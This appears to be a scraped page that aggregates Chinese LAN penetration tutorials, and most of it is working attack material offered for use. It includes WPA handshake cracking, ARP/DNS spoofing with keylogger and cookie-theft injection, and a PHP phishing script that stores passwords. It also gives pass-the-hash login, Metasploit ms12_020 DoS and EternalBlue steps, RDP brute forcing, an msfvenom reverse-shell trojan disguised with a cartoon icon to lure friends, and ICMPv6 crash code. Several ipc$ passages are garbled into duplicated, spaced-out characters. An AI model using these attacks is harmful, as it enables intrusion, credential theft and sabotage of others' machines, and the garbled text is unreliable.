精华内容
下载资源
问答
  • 局域网渗透

    2013-01-03 02:45:06
    局域网渗透软件 usage: hijack <-LVXhefvqsxrkHDtNzoi> <-d dev> <-S interval> |byline|none> <-F jobfile> <-p port> <-IO pcap_dump> <-E quit time> <-b submask> <-m speed> <Source Host> ...
  • 一些内网的,命令行格式的工具,可以来看看,很简单
  • windows的局域网渗透

    千次阅读 2019-06-03 15:26:49
    或者你把木马复制到了局域网内的主机,导致连接失败(反向连接的木马不会发生这种情况)。如果你没有想到这种情况,你会以为是复制上出了问题,但实际你的复制操作已经成功了,只是运行时出了问题。 黑客技术——...

    转:http://www.360doc.com/content/15/0504/05/13092497_467784134.shtml
    黑客技术——ipc$命令所使用的端口

    首先我们来了解一些基础知识:

    1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务;

    2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。

    3 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现。

    有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:

    对于win2000客户端(发起端)来说:

    1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;

    2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。

    对于win2000服务器端来说:

    1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING);

    2 如果禁止NBT,那么只有445端口开放。

    我们建立的ipc 会 话 对 端 口 的 选 择 同 样 遵 守 以 上 原 则 。 显 而 易 见 , 如 果 远 程 服 务 器 没 有 监 听 139 或 445 端 口 , i p c 会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc 139445ipc会话是无法建立的。

    黑客技术——ipc管道在黑客攻击中的意义

    ipc管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放ipc管道的主机似乎更容易得手。通过ipc管道,我们可以远程调用一些系统函数(大多通过工具实现,但需要相应的权限),这往往是入侵成败的关键。如果不考虑这些,仅从传送文件这一方面,ipc管道已经给了入侵者莫大的支持,甚至已经成为了最重要的传输手段,因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当然,我们也不能忽视权限在ipc管道中扮演的重要角色,想必你一定品尝过空会话的尴尬,没有权限,开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限,那么ipc管道这把双刃剑将显示出它狰狞的一面。

    黑客技术——ipc$连接失败的常见原因

    以下是一些常见的导致ipc$连接失败的原因:

    1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc 连 接 , 98 / m e 是 不 能 建 立 i p c 连接,98/me是不能建立ipc 98/meipc连接的;

    2 如果想成功的建立一个ipc 连 接 , 就 需 要 响 应 方 开 启 i p c 连接,就需要响应方开启ipc ipc共享,即使是空连接也是这样,如果响应方关闭了ipc$共享,将不能建立连接;

    3 连接发起方未启动Lanmanworkstation服务(显示名为:Workstation):它提供网络链结和通讯,没有它发起方无法发起连接请求;

    4 响应方未启动Lanmanserver服务(显示名为:Server):它提供了 RPC 支持、文件、打印以及命名管道共享,ipc 依 赖 于 此 服 务 , 没 有 它 主 机 将 无 法 响 应 发 起 方 的 连 接 请 求 , 不 过 没 有 它 仍 可 发 起 i p c 依赖于此服务,没有它主机将无法响应发起方的连接请求,不过没有它仍可发起ipc ipc连接;

    5 响应方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份(不过这种情况好像不多);

    6 响应方的139,445端口未处于监听状态或被防火墙屏蔽;

    7 连接发起方未打开139,445端口;

    8 用户名或者密码错误:如果发生这样的错误,系统将给你类似于’无法更新密码’这样的错误提示(显然空会话排除这种错误);

    9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;

    10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。

    另外,你也可以根据返回的错误号分析原因:

    错误号5,拒绝访问:很可能你使用的用户不是管理员权限的;

    错误号51,Windows无法找到网络路径:网络有问题;

    错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);

    错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;

    错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;

    错误号1326,未知的用户名或错误密码:原因很明显了;

    错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;

    错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。

    黑客技术——复制文件失败的原因

    有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?

    1 对方未开启共享文件夹

    这类错误出现的最多,占到50%以上。许多朋友在ipc 连 接 建 立 成 功 后 , 甚 至 都 不 知 道 对 方 是 否 有 共 享 文 件 夹 , 就 进 行 盲 目 复 制 , 结 果 导 致 复 制 失 败 而 且 郁 闷 的 很 。 因 此 我 建 议 大 家 在 进 行 复 制 之 前 务 必 用 n e t v i e w I P 这 个 命 令 看 一 下 你 想 要 复 制 的 共 享 文 件 夹 是 否 存 在 ( 用 软 件 查 看 当 然 更 好 ) , 不 要 认 为 能 建 立 i p c 连接建立成功后,甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下你想要复制的共享文件夹是否存在(用软件查看当然更好),不要认为能建立ipc netviewIPipc连接就一定有共享文件夹存在。

    2 向默认共享复制失败

    这类错误也是大家经常犯的,主要有两个小方面:

    1)错误的认为能建立ipc 连 接 的 主 机 就 一 定 开 启 了 默 认 共 享 , 因 而 在 建 立 完 连 接 之 后 马 上 向 c 连接的主机就一定开启了默认共享,因而在建立完连接之后马上向c c,d , a d m i n ,admin ,admin之类的默认共享复制文件,一旦对方未开启默认共享,将导致复制失败。ipc 连 接 成 功 只 能 说 明 对 方 打 开 了 i p c 连接成功只能说明对方打开了ipc ipc共享,并不能说明默认共享一定存在。ipc 共 享 与 默 认 共 享 是 两 码 事 , i p c 共享与默认共享是两码事,ipc ipc共享是一个命名管道,并不是哪个实际的文件夹,而默认共享却是实实在在的共享文件夹;

    2)由于net view \IP 这个命令无法显示默认共享文件夹(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)

    要点:请大家一定区分ipc共享,默认共享,普通共享这三者的区别:ipc共享是一个管道,并不是实际的共享文件夹;默认共享是安装时默认打开的文件夹;普通共享是我们自己开启的可以设置权限的共享文件夹。

    3用户权限不够,包括四种情形:

    1)空连接向所有共享(默认共享和普通共享)复制时,权限是不够的;

    2)向默认共享复制时,在Win2000 Pro版中,只有Administrators和Backup Operators组成员才可以,在Win2000 Server版本 Server Operatros组也可以访问到这些共享目录;

    3)向普通共享复制时,要具有相应权限(即对方管理员事先设定的访问权限);

    4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;

    注意:

    1 不要认为administrator就一定具有管理员权限,管理员名称是可以改的

    2 管理员可以访问默认共享的文件夹,但不一定能够访问普通的共享文件夹,因为管理员可以对普通的共享文件夹进行访问权限设置,如图6,管理员为D盘设置的访问权限为仅允许名为xinxin的用户对该文件夹进行完全访问,那么此时即使你拥有管理员权限,你仍然不能访问D盘。不过有意思的是,如果此时对方又开启了D 的 默 认 共 享 , 那 么 你 却 可 以 访 问 D 的默认共享,那么你却可以访问D 访D,从而绕过了权限限制,有兴趣的朋友可以自己做测试。

    4被防火墙杀死或在局域网

    还有一种情况,那就是也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;或者你把木马复制到了局域网内的主机,导致连接失败(反向连接的木马不会发生这种情况)。如果你没有想到这种情况,你会以为是复制上出了问题,但实际你的复制操作已经成功了,只是运行时出了问题。

    黑客技术——关于at命令和xp对ipc$的限制

    本来还想说一下用at远程运行程序失败的原因,但考虑到at的成功率不是很高,问题也很多,在这里就不提它了(提的越多,用的人就越多),而是推荐大家用psexec.exe远程运行程序,假设想要远程机器执行本地c:\xinxin.exe文件,且管理员为administrator,密码为1234,那么输入下面的命令:

    psexec \ip -u administrator -p 1234 -c c:\xinxin.exe

    如果已经建立ipc连接,则-u -p这两个参数不需要,psexec.exe将自动拷贝文件到远程机器并运行。

    本来xp中的ipc$也不想在这里讨论,想单独拿出来讨论,但看到越来越多的朋友很急切的提问为什么遇到xp的时候,大部分操作都很难成功。我在这里就简单提一下吧,在xp的默认安全选项中,任何远程访问仅被赋予来宾权限,也就是说即使你是用管理员帐户和密码,你所得到的权限也只是Guest,因此大部分操作都会因为权限不够而失败,而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了xp的管理员密码,我建议你尽量避开ipc管道。

    黑客技术——如何打开目标的IPC$共享以及其他共享

    目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马,cmd重定向等,然后在shell下执行:

    net share ipc$

    开放目标的ipc$共享;

    net share ipc$ /del

    关闭目标的ipc$共享;如果你要给它开共享文件夹,你可以用:

    net share xinxin=c:\

    这样就把它的c盘开为共享名为xinxin共享文件夹了。(可是我发现很多人错误的认为开共享文件夹的命令是net share c$,还大模大样的给菜鸟指指点点,真是误人子弟了)。再次声明,这些操作都是在shell下才能实现的。

    黑客技术——一些需要shell才能完成的命令

    看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:

    1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;

    2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;

    3 运行/关闭远程主机的服务,需要在shell下完成;

    4 启动/杀掉远程主机的进程,也需要在shell下完成(用软件的情况下除外,如pskill)。

    ipc$连接在实际操作过程中会出现各种各样的问题,本文就为大家总结这么多内容,如有遗漏欢迎指正。

    展开全文
  • wifi破解到局域网渗透

    2019-07-08 19:23:49
    二,局域网渗透 1,还是路由器 知道了wifi密码还不够,还需要得到拨号帐号密码。 a)默认的帐号密码 b)路由器漏洞  routerpwn c)基础认证钓鱼  http://www.qq2b.net/archives/213.html wifiphiser  :...

    本文转自 _博客

    一,密码破解

    wifi破解最主要的还是抓握手包破解(不要给我说某某钥匙的“分享”)。

    wifi认证主要分为四步:

    1,无线客户端与ap连接时,首先发送一个认证请求包

    2,ap收到请求后发送一段信息给客户端

    3,客户端将信息加密后交给ap

    4,ap检查加密结果是否正确,正确则连接,反之否。

    破解步骤(以aircrack-ng为例子):

    1,将无线网卡打开至监听模式:

    airmon-ng start wlan0

    root@kali: ~-wifi-crack_006

    2,探测无线网络:

    airodump-ng mon0

    root@kali: ~-wifi-crack_008

    3,选择要破解的路由器

    airodump-ng -c 信道号 –bssid ap的mac -w 保存的包名 mon0root@kali: ~-wifi-crack_009

    4,发送deauth攻击,使客户端断开ap,然后自动重连,方便抓取握手包

    aireplay-ng -0 10 -a ap的mac -c 客户端的mac –ignore-negative-one mon0

    root@kali: ~-wifi-crack_010

    5,破解

    aircrack-ng -w 字典 之前保存的包名

    root@kali: ~-wifi-crack_011

    也可以使用fern-wifi-cracker这个python写的图形化傻瓜式一键破解工具。

    Fern WIFI Cracker_012

    二,局域网渗透

    1,还是路由器

    知道了wifi密码还不够,还需要得到拨号帐号密码。

    a)默认的帐号密码

    b)路由器漏洞 routerpwn

    c)基础认证钓鱼 http://www.qq2b.net/archives/213.html
    wifiphiser :伪造热点,并且弹出一个路由器升级提示页面,让你输入密码

    2,中间人攻击

    局域网不用像内网域渗透那样小心翼翼

    1)dsploit,cain,ettercap等工具

    注入js钓鱼,嗅探密码,下载替换,会话劫持,dns毒化等等配合社工效果更佳。特别细化dns毒化+set工具包的站点克隆。

    转载于:https://www.cnblogs.com/dongchi/p/5170191.html

    展开全文
  • kali-Linux局域网渗透之Win2008

    千次阅读 2021-03-27 09:42:22
    相关参数 kali的IP地址为:192.168.0.103/24 win2003的IP地址为:192.168.0.138/24 (一)蓝屏攻击(针对2008) ...渗透前提 nmap -sV [IP地址] 或 nmap -sS -sV [IP地址]都可 #大家怎么方便怎么来 情

    相关参数

    kali的IP地址为:192.168.0.150/24
    win2008的IP地址为:192.168.0.?/24
    IP还是要看环境(可能会不同)–Kali一般不变

    (一)蓝屏攻击(针对2008)

      前提:对方开启3389端口且只对某些操作系统有效

      原理:利用操作系统内核的缺陷,发送大量数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码

    可使用Kali自带的nmap来进行扫描

    渗透前提

    nmap -sV [IP地址] 或 nmap -sS -sV [IP地址]都可
    #大家怎么方便怎么来
    

    情况一(在我们对自己靶机2008进行扫描时,发现对方没有开启3389)需做的操作

    • 打开我们的2008,右键计算机 ,点击属性
      在这里插入图片描述

    • 点击远程设置,点击远程,选择复选框第二个(打开我们的远程桌面)在这里插入图片描述

    再次查看扫描结果:
    在这里插入图片描述
      在上图我们可以看到的对方系统为2008R2(确定我们的目标) 如果这里还不出来,可以使用系统扫描-O参数(nmap -O [IP地址])

    渗透开始

    #从上面得出的信息,我们可以从中得知,靶机开启了3389,且操作系统也在我们的攻击范围之内  使用kali版本号为2021
    ┌──(root💀kali)-[~/桌面]
    └─# msfconsole 
    #search查看m12_020漏洞的模块
    msf6 > search ms12_020 
    
    Matching Modules
    ================
    
       #  Name                                              Disclosure Date  Rank    Check  Description
       -  ----                                              ---------------  ----    -----  -----------
       0  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS
       1  auxiliary/scanner/rdp/ms12_020_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker
    
    
    Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/rdp/ms12_020_check                                            
    
    #使用检查模块1
    msf6 > use 1
    #查看所需要的参数
    msf6 auxiliary(scanner/rdp/ms12_020_check) > show options 
    
    Module options (auxiliary/scanner/rdp/ms12_020_check):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT    3389             yes       Remote port running RDP (TCP)
       THREADS  1                yes       The number of concurrent threads (max one per host)
    
    msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.0.101
    rhosts => 192.168.0.101
    msf6 auxiliary(scanner/rdp/ms12_020_check) > set threads 30
    threads => 30
    msf6 auxiliary(scanner/rdp/ms12_020_check) > exploit 
    
    #发现存在这个漏洞
    [+] 192.168.0.101:3389    - 192.168.0.101:3389 - The target is vulnerable.
    [*] 192.168.0.101:3389    - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/rdp/ms12_020_check) > 
    #开始攻击 使用auxiliary/scanner/rdp/ms12_020_maxchannelids模块
    msf6 auxiliary(scanner/rdp/ms12_020_check) > use 0
    #查看所需参数
    msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options 
    
    Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   3389             yes       The target port (TCP)
    
    #设置对方IP地址
    msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhosts 192.168.0.101
    rhosts => 192.168.0.101
    #开始攻击
    msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > exploit 
    [*] Running module against 192.168.0.101 #可以看到在执行着攻击
    

    效果:在这里插入图片描述

    那么如何进行加固呢?

    • 打补丁
    • 将远程桌面默认端口改变成别的端口(ms12_020摸端口为3389)
    • 关闭远程桌面

    一、打补丁
    操作步骤:打开Windows Update安装更新即可
    补丁链接(点我)
    双击安装即可(需要重新启动生效)
    打完补丁的2008就像磕了药似的,打不进去
    在这里插入图片描述

    我们再来攻击一下其他没打补丁的2008,验证是否成功
    在这里插入图片描述
    瞬间蓝屏:
    在这里插入图片描述
    所以打补丁是很让人放心的了,既不用关闭服务,也不用修改端口

    修改远程桌面的默认端口3389(图片示例为win10,win2008其实也一样)
      win+r,输入regedit 找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\ 修改PortNumber为2000
    在这里插入图片描述
    然后再将HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\Tenninal Server\WinStations\RDP-Tcp中的PortNumber修改为2000
    在这里插入图片描述
    如果诸位仁兄开启了防火墙,那就加一条入站和出战的规则即可
    操作步骤:

    • 新增入站规则(右键入站规则)—》新建规则–》选择端口–》TCP特定端口为2000–》允许连接–》默认(全打勾)–》名称随便取(只要不重名)
    • 新增出站规则(右键出战规则)–》新建规则–》选择端口–》TCP特点端口为2000–》允许连接–》全打勾–》名字随便取(不重名即可)

    确认是否成功(y/n)?
    在这里插入图片描述
    说明成功了!再次尝试使用ms12_020模块对2008进行渗透攻击

    开始渗透:

    在这里插入图片描述
    再次渗透:
    先进行扫描:
    发现对方开启了2000端口(竟然用到了思科的SCCP端口号,算了,不管了)
    将ms_0120的dport模块变为2000
    再次开始渗透!
    在这里插入图片描述
    攻击成功!(兄弟们还是老老实实打补丁吧)
    在这里插入图片描述

    (二) 密码爆破(针对弱口令密码电脑)

    • hydra(九头蛇)–3389端口密码爆破

    九头蛇命令:

    hydra [IP地址] rdp -L [用户名字典] -P [密码字典] -V
    #本实验的命令
    hydra 192.168.0.102 rdp -L /username.txt -P /password.txt -V
    #字典自己上网找一下就有了--弱口令
    

    九头蛇就爆破出来了(3389)
    在这里插入图片描述

    (三)永恒之蓝

    渗透前提:

    用nmap对目标靶机进行扫描时,发现对端开启了445端口,且系统版本在我们的攻击范围之内!在这里插入图片描述

    开始渗透:

    #使用auxiliary/scanner/smb/smb_ms17_010模块测试对端是否存在ms17_010漏洞
    msf6 > use auxiliary/scanner/smb/smb_ms17_010 
    msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.0.105
    rhosts => 192.168.0.105
    msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit 
    #对方存在MS17_010漏洞
    [+] 192.168.0.105:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
    [*] 192.168.0.105:445     - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    
    #使用永恒之蓝漏洞(针对win7和2008)
    msf6 > use exploit/windows/smb/ms17_010_eternalblue
    [*] Using configured payload windows/x64/meterpreter/reverse_tcp
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.0.105
    rhosts => 192.168.0.105
    msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit 
    

    攻击成功:
    在这里插入图片描述
    在meterpreter可以做很多的事情,比如:
    在这里插入图片描述
    一、查看监控

    meterpreter > run vnc
    

    在这里插入图片描述
    二、查看摄像头

    #由于我虚拟机没有摄像头,就没有实例了
    meterpreter > webcam_snap 
    

    等等…如有时间可以写个专门关于这个的博客…

    防护手段:

    一、直接暴力:将Server服务禁止了
    在这里插入图片描述
    验证是否成功
    在这里插入图片描述
    成功!!!*

    二、补丁大法
    KB4012212补丁链接
    进行安装:
    在这里插入图片描述
    安装完需重启系统
    在这里插入图片描述

    再次渗透:

    先使用辅助模块进行测试
    在这里插入图片描述
    不信这个邪了!!!
    直接攻击!!!
    在这里插入图片描述
    尝试攻击其他Win2008
    在这里插入图片描述
    成功!!!

    (四)上传木马(百试百灵)

    #生成木马
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=[本地IP地址] LPORT=[端口] -f 文件类型 > /root/[命名].[后缀]
    
    #示例
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4321 -f exe > /root/1.exe
    
    #等待钓鱼
    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set LPORT  4321
    msf6 exploit(multi/handler) > set lhost  192.168.0.150
    msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > exploit 
    

    在2008上双击运行
    在这里插入图片描述
    那我们怎么伪装我们的木马程序呢?

    #生成shellcode
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4321 -f c > /root/1.c
    

    然后我们用C语言编译执行即可!(网上有教程)
    这里只教方法,我的思路是将exe的图标改成好看的动漫角色诱使对方点击!
    图片转ico网站
    我们再将代码搞进VS中,右键我们的项目–》添加–》资源–》新建ico文件
    新建后可以看到文件为ico1.ico文件 我们将我们的生成的ico文件名改为ico1.ico即可
    替换掉新建的ico文件即可

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    再次编译运行即可!
    在这里插入图片描述
    再将名字修改一下即可,然后发给局域网中的好朋友!

    要是图片想换怎么办呢,只有一个exe时,我们可以使用Resource Hacker这个软件实现换图片
    在这里插入图片描述1、打开我们的exe文件(我也不知道为什么怎么模糊。。。)
    在这里插入图片描述
    二、选择我们备好的ico文件(我的是酷酷的小黄人)
    在这里插入图片描述
    三、替换掉即可
    在这里插入图片描述
    可以看到的我们的exe程序变成了酷酷的小黄人了!
    在这里插入图片描述
    大家可以在此基础扩展,我就溜溜球了~

    防护手段:

    无时无刻打开杀毒软件,当收到.exe文件时,都要对其用杀毒软件查杀!也不要乱下载文件,要去应用商店或者可靠的地方进行下载!

    (五)MS10_018漏洞

    HTML渲染远程代码执行漏洞
    渗透开始

    msf6 exploit(windows/browser/ms10_018_ie_tabular_activex) > set payload windows/meterpreter/reverse_tcp
    msf6 exploit(windows/browser/ms10_018_ie_tabular_activex) > set lport 4567
    msf6 exploit(windows/browser/ms10_018_ie_tabular_activex) > set SRVHoST 192.168.0.150
    msf6 exploit(windows/browser/ms10_018_ie_tabular_actives) > session -l 
    msf6 exploit(windows/browser/ms10_018_ie_tabular_actives) > session 2
    

    在这里插入图片描述
    然后用win2008访问这个链接即可,但不知道为什么我后续再搞就一直不成功了?有点懵,对这个模块不怎么熟!

    (五)Win10蓝屏攻击

    原理:发送恶意的ICMPv6数据包使其电脑崩溃
    受影响的Windows版本:

    1. Windows 10 2004
    2. Windows 10 1909
    3. Windows 10 1709
    4. Windows 10 1803
    5. Windows 10 1809
    6. …等等

    代码:

    #网上的攻击代码,仅供参考!
    from scapy.all import *
    
    v6_dst = "";#目的IPv6地址
    v6_src  = "";#源IPv6地址
    
    p_test_half = 'A'.encode()*8  + b"\x18\x30" + b"\xFF\x18"
    p_test=p_test_half + 'A'.encode()*4
    
    c = ICMPv6NDOptEFA();
    e = ICMPv6NDOptRDNSS()
    
    e = ICMPv6NDOptRDNSS()
    e.len=21
    e.dns = [
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
    "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",]
    
    pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
    	Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e / e / e / e / e
    
    p_test_frag = IPv6(dst=v6_dst,src=v6_src,hlim=255)/ \
    	IPv6ExtHdrFragment()/pkt
    
    l = fragment6(p_test_frag,200)
    
    for p in l:
        send(p)
    

    在这里插入图片描述
    防护手段:
    1.万能补丁大法
    CVE-2020-16898补丁
    2.将IPv6关了
    在这里插入图片描述
    再次攻击发现没有用
    3.升级Windows版本

    就先讲到这…嘿嘿,如果觉得不错,点完赞再走呗!!!(码字很累的)

    在这里插入图片描述

    展开全文
  • 局域网渗透测试篇

    2021-03-01 22:26:29
    局域网渗透测试篇-链接上wifi以后的骚操作中间人攻击arpspoof&&driftnet篇driftnet软件参数详解ettercap进行arp攻击mitmf注入脚本(XSS)kali使用密文直接登录pth-winexe工具 中间人攻击 arpspoof&&...

    中间人攻击

    arpspoof&&driftnet篇

    arpspoof详解

    #安装dsniff(arpspoof是dsniff集成的一个工具)和driftnet
    apt-get install dsniff
    apt-get install driftnet
    
    #开启ip转发功能
    echo 1 > /proc/sys/net/ipv4/ip_forward 
    
    #开始攻击-t 欺骗目标ip -r 路由器ip
    arpspoof -t 192.168.0.15 -r 192.168.0.1
    或者-t 网关ip 目标ip
    arpspoof -i eth0 -t 192.168.0.1 192.168.0.2
    
    #获取攻击目标浏览的图片
    driftnet -i eth0
    driftnet -i eth0 -a -d ./pics -s	//将图片存放到./pic文件夹下面
    
    #抓取明文密码
    dsniff -i eth0 -m
    

    driftnet软件参数详解

    主要参数:
    	-b    捕获到新的图片时发声
    	-i      选择监听接口
    	-f     读取一个指定pcap数据包中的图片
    	-a  后台模式:
    	-m  指定保存图片数的数目
    	-d  指定保存图片的路径
    	-x   指定保存图片的前缀名
    

    ettercap进行arp攻击

    #arp欺骗 -M 攻击模式 -q 静默模式 -T
    ettercap -i eth0 -Tq -M arp:remote /192.168.0.2// /192.168.0.1// 
    

    mitmf注入脚本(XSS)

    #安装
    1.安装依赖
    sudo apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
    2.安装mitmf
    sudo apt-get install mitmf
    
    
    
    # 作为中间人连接网页并插入 js
    mitmf --spoof --arp -i eth0 --gateway 10.10.10.2 --target 10.10.10.133 --inject --js-url http://10.10.10.131:3000/hook.js
    
    # 键盘记录器 --jskeylogger
    mitmf --spoof --arp -i eth0 --gateway 10.10.10.2 --target 10.10.10.133 --jskeylogger
    
    # 图片:--upsidedownternet、--screen(/var/log/mitmf)
    mitmf --spoof --arp -i eth0 --gateway 10.10.10.2 --target 10.10.10.133 --upsidedownterne
    
    # cookie:--ferretng(cookie)
    mitmf --spoof --arp -i eth0 --gateway 10.10.10.2 --target 10.10.10.133 --ferretng
    
    # 凌空插后门 –filepwn
    mitmf --spoof --arp -i eth0 --gateway 10.10.10.2 --target 10.10.10.133 --filepwn
    

    kali使用密文直接登录

    pth-winexe工具

    pth-winexe -U John%aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 //10.10.10.133 cmd
    

    DNS攻击

    ettercap实现

    #编辑dns解析记录
    vim /etc/ettercap/etter.dns
    
    #开启Apache服务或者python临时网站
    systemctl start apache2
    或者
    python -m SimpleHTTPServer 8080
    
    
    #放置钓鱼网站到/var/www/html目录下(使用apache2时放在这个目录下)
    #或者使用python -m SimpleHTTPServer 8080时放在./目录下
    
    #ettercap软件(已经打开ARP投毒),再打开DNS投毒
    

    钓鱼网站页面

    前台网页 (httrack克隆)

    #安装
    sudo apt-get install httrack
    
    #建一个文件夹放置克隆的网页
    mkdir gateway-fish
    cd gateway-fish
    
    #启动
    httrack
    

    后台脚本

    <?php
    $nam = stripslashes($_REQUEST['username']);
    $pas = stripslashes($_REQUEST['login_pwd']);
    $retr = "\n";
    $content = "账号:".$nam."密码:".$pas;
    echo $content;
    $file = fopen("userpass.txt","w");
    fwrite($file,$content);
    fwrite($file,$retr);
    fclose($file);
    ?>
    
    <html>
    <head>
    <script type="text/javascript">
    function goback()
    {
    	window.history.back()
    }
    </script>
    </head>
    <body onload="goback()"></body>
    </html>
    
    展开全文
  • Windows局域网渗透(协议)

    千次阅读 2018-08-12 02:19:33
    这个协议被Microsoft用于它们Lan Manager和Windows NT服务器系统中,而Windows系统均包括这个协议的客户软件,因而这个协议在局域网系统中影响很大。  随着Internet的流行,Microsoft希望将这个协议扩展到Internet...
  • 局域网渗透工具合集

    千次阅读 2015-03-29 21:14:45
    dsniff为网络审计和渗透工具集合:   抓取网络上内容:dsniff filesnarf mailsnarf msgsnarf urlsnarf和webspy    欺骗工具:arpspoof dnsspoof和macof:   中间人攻击:sshmitm和webmitm:  以下摘自:...
  • Windows局域网渗透(IPC$管道)

    千次阅读 2018-08-12 02:21:00
    或者你把木马复制到了局域网内的主机,导致连接失败(反向连接的木马不会发生这种情况)。如果你没有想到这种情况,你会以为是复制上出了问题,但实际你的复制操作已经成功了,只是运行时出了问题。 黑客技术——...
  • 网络环境 实验前提 1.外网win7上传一句话菜刀连接2008 2.上传 3.kali配置隧道端口 sudo vim /etc/proxychains.conf ./reGeorgSocksProxy.py -u ...proxychains msfconsole
  • Windows局域网渗透(服务,端口)

